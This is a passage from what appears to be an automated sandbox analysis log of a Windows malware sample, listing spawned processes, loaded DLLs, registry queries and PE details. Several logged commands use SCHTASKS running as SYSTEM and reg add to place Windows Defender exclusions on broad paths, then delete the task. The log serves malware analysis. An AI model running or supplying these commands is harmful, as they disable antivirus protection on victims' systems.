              Source: unknownProcess created: C:\Program Files (x86)\8srsV\pw8XjN.exe "C:\Program Files (x86)\8srsV\pw8XjN.exe"
              Source: unknownProcess created: C:\Program Files (x86)\8srsV\pw8XjN.exe "C:\Program Files (x86)\8srsV\pw8XjN.exe"
              Source: unknownProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeProcess created: C:\Program Files (x86)\2dHqG0\2dHqG0.exe "C:\Program Files (x86)\2dHqG0\2dHqG0.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.iniJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: pid.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: hid.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: twext.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: cscui.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: starttiledata.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: usermgrproxy.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: acppage.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: aepic.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: tbcore3u.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: devenum.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\8srsV\pw8XjN.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\2dHqG0\2dHqG0.exeSection loaded: tbcore3u.dll
              Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Documents\BEqRkb.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
              Source: 2o63254452-763487230.06.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: 2o63254452-763487230.06.exeStatic file information: File size 30965248 > 1048576
              Source: 2o63254452-763487230.06.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58400
              Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 2dHqG0.exe, 00000028.00000002.3513701464.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 2dHqG0.exe, 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000028.00000000.3214205263.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000029.00000002.3248013208.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 00000029.00000000.3240358460.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, pw8XjN.exe, 0000002A.00000000.3243643193.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, 2dHqG0.exe, 0000002D.00000000.3262531939.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, 2dHqG0.exe, 0000002D.00000002.3274838743.0000000000B28000.00000002.00000001.01000000.0000000A.sdmp, pw8XjN.exe, 0000002E.00000002.3274822445.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002E.00000000.3265224479.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 0000002F.00000000.3373599420.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp, pw8XjN.exe, 